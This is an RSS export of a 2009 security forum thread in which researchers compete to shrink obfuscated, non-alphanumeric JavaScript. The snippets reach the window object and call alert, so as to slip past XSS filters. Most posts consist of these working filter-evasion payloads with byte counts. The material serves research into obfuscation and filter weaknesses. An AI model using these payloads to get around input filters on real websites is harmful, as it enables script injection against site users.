<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>New XSS vectors/Unusual Javascript</title>
        <description>I've created this thread to store new XSS techniques, I'll start it off with a quoteless string without using fromCharCode:-


alert( String(/Test/).substr(1,4) );</description>
        <link>http://sla.ckers.org/forum/read.php?2,15812,15812#msg-15812</link>
        <lastBuildDate>Mon, 20 May 2013 02:45:32 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28636#msg-28636</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28636#msg-28636</link>
            <description><![CDATA[Based on comments by sirdarckcat, I created a new folder for obfuscation tricks, because one long thread is just getting out of control, and I think you guys are onto bigger things than just XSS as well.  Please post all future comments into this forum folder:  http://sla.ckers.org/forum/list.php?24]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 07 Jun 2009 20:55:16 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28633#msg-28633</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28633#msg-28633</link>
            <description><![CDATA[concat() also works:<br />
<br />
({}=[].concat)()[0] == window]]></description>
            <dc:creator>C1c4Tr1Z</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 07 Jun 2009 19:41:09 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28618#msg-28618</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28618#msg-28618</link>
            <description><![CDATA[Do I win yet? :D]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 07 Jun 2009 06:09:51 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28616#msg-28616</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28616#msg-28616</link>
            <description><![CDATA[wow, that's cool<br />
([],[].sort)() == window<br />
<br />
we dont need assignments anymore]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 07 Jun 2009 05:03:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28609#msg-28609</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28609#msg-28609</link>
            <description><![CDATA[(Å=[],[µ=!Å+Å][µ[È=++Å+Å+Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)<br />
<br />
88!]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 06 Jun 2009 17:33:01 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28606#msg-28606</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28606#msg-28606</link>
            <description><![CDATA[Just when you think this contest is over...there goes another byte]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 06 Jun 2009 08:33:13 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28585#msg-28585</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28585#msg-28585</link>
            <description><![CDATA[91<br />
(É=[Å=É=[]][(µ=!É+É)[È=++Å+Å+Å]+({}+É)[Å]+(ª=(Ç=!!È+É)[Å]+Ç[+É])])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)<br />
<br />
------------------------<br />
<br />
90<br />
(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 14:32:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28578#msg-28578</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28578#msg-28578</link>
            <description><![CDATA[This was hard work:-<br />
<br />
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wKCKqwMHCw8TGyMnKy8zNzs%2FQ0dLT1NXW2Nna29zd3t%2Fg4eLj5OXm5%2Bjp6uvs7e7v8PHy8%2FT19vj5%2Bvv8%2Ff4kXyIpPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D<br />
<br />
I've reduced the code to generate the code block rather than each letter and now it's possible to define your own variables.<br />
<br />
I could randomise the number generation and expressions too, I might do it]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 10:53:11 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28577#msg-28577</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28577#msg-28577</link>
            <description><![CDATA[i love how inside each strings, the charaters required to get each letter decreases as you go along since you can reuse fragments gathered earlier]]></description>
            <dc:creator>thornmaker</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 10:37:58 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28575#msg-28575</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28575#msg-28575</link>
            <description><![CDATA[Nuts.  Just plain nuts.<br />
<br />
-Matt]]></description>
            <dc:creator>Matt Presson</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 10:22:25 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28568#msg-28568</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28568#msg-28568</link>
            <description><![CDATA[Got it down to 93 now<br />
<br />
($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(º=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[Å+Å]+Ç[_]+º](Å)]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 03:32:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28567#msg-28567</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28567#msg-28567</link>
            <description><![CDATA[actually it does depending on the charset (on php), but here we are just sticking to a-zA-Z0-9<br />
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 02:25:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28566#msg-28566</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28566#msg-28566</link>
            <description><![CDATA[Really cool stuff !I love it!<br />
<br />
(Although, as Swedish, I am a bit offended that Å does not count as an alphabetic letter... )]]></description>
            <dc:creator>holiman</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 01:36:24 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28565#msg-28565</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28565#msg-28565</link>
            <description><![CDATA[you people seriously worry me.. pretty soon I'm going to have to call shenanigans.. :)]]></description>
            <dc:creator>thrill</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 05 Jun 2009 00:46:50 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28561#msg-28561</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28561#msg-28561</link>
            <description><![CDATA[x=[].reverse,x() === window]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 21:56:02 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28560#msg-28560</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28560#msg-28560</link>
            <description><![CDATA[anyway, this bypasses the filter for /\w/<br />
<br />
(É=[É=[]][(µ=!É+É)[È=-~-~-~É]+({}+É)[Å=È/È]+(ª=(Ç=!!È+É)[Å]+Ç[+É])])()[µ[Å]+µ[È+~É]+Ç[È]+ª](Å)<br />
<br />
not even $.. god.. why so serious?<br />
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 20:57:05 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28559#msg-28559</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28559#msg-28559</link>
            <description><![CDATA[ok this then :P<br />
<br />
($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(º=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[_+~$]+Ç[_]+º](Å)]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 20:54:23 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28558#msg-28558</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28558#msg-28558</link>
            <description><![CDATA[this is an a: ª<br />
<br />
wtf what is alnum now?]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 20:47:19 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28557#msg-28557</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28557#msg-28557</link>
            <description><![CDATA[($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(ª=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[_+~$]+Ç[_]+ª](Å)<br />
<br />
94]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 20:37:51 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28555#msg-28555</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28555#msg-28555</link>
            <description><![CDATA[<pre class="bbcode">(µ=[µ=[]][(ø=!µ+µ)[ª=-~-~-~µ]+({}+µ)[ª/ª]+(æ=(µª=!!ª+µ)[ª/ª]+µª[+µ])])()[ø[ª/ª]+ø[ª+~µ]+µª[ª]+æ](ª/ª)</pre>
<br />
<b>101... and no quotes</b> :) and works in Firebug (like anyone would care *g*)]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 17:17:46 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28554#msg-28554</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28554#msg-28554</link>
            <description><![CDATA[Ok now I'm cheating :) cheap shot I know. jeez anything to win haha<br />
<br />
($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[_/_]+(ª=($_=!''+$)[_/_]+$_[+$])])()[µ[_/_]+µ[_+~$]+$_[_]+ª](_/_)<br />
<br />
101!]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 16:27:31 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28553#msg-28553</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28553#msg-28553</link>
            <description><![CDATA[@mario<br />
<br />
That's awesome, I didn't think that would be shortened]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 14:58:53 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28552#msg-28552</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28552#msg-28552</link>
            <description><![CDATA[@sdc I did some homework for you :)<br />
<br />
<pre class="bbcode">$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])],$()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)</pre>
<br />
or<br />
<br />
<pre class="bbcode">($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)</pre>
<br />
<b>106</b>]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 14:31:30 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28548#msg-28548</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28548#msg-28548</link>
            <description><![CDATA[window['Event']['constructor']['__proto__']['__proto__']['__parent__']['_content'].alert(1)]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 12:02:25 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28545#msg-28545</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28545#msg-28545</link>
            <description><![CDATA[Very nice :)]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 09:15:56 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28543#msg-28543</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28543#msg-28543</link>
            <description><![CDATA[Nice.]]></description>
            <dc:creator>Matt Presson</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 08:35:27 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28542#msg-28542</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28542#msg-28542</link>
            <description><![CDATA[ok, you want to play like that, lets play like that.<br />
<br />
$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+($_)[+$])],$()[(__)[_/_]+(__)[_+~$]+($_)[_]+$$](_/_)<br />
<br />
114]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 08:13:19 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28541#msg-28541</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28541#msg-28541</link>
            <description><![CDATA[$=[$=[]][(!$+$)[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+$)[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'')  - 134 chars]]></description>
            <dc:creator>Matt Presson</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 08:09:33 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28533#msg-28533</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28533#msg-28533</link>
            <description><![CDATA[alphanumeric === a-zA-Z0-9 <br />
<br />
:P]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 04:01:51 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,15812,28532#msg-28532</guid>
            <title>Re: New XSS vectors/Unusual Javascript</title>
            <link>http://sla.ckers.org/forum/read.php?2,15812,28532#msg-28532</link>
            <description><![CDATA[ah true.. in firebug you codes dont work hehe... that's why I was confused.<br />
<br />
(ohhh you are cheating, using _ matches as a word char..)]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 04 Jun 2009 03:20:10 -0500</pubDate>
        </item>
    </channel>
</rss>
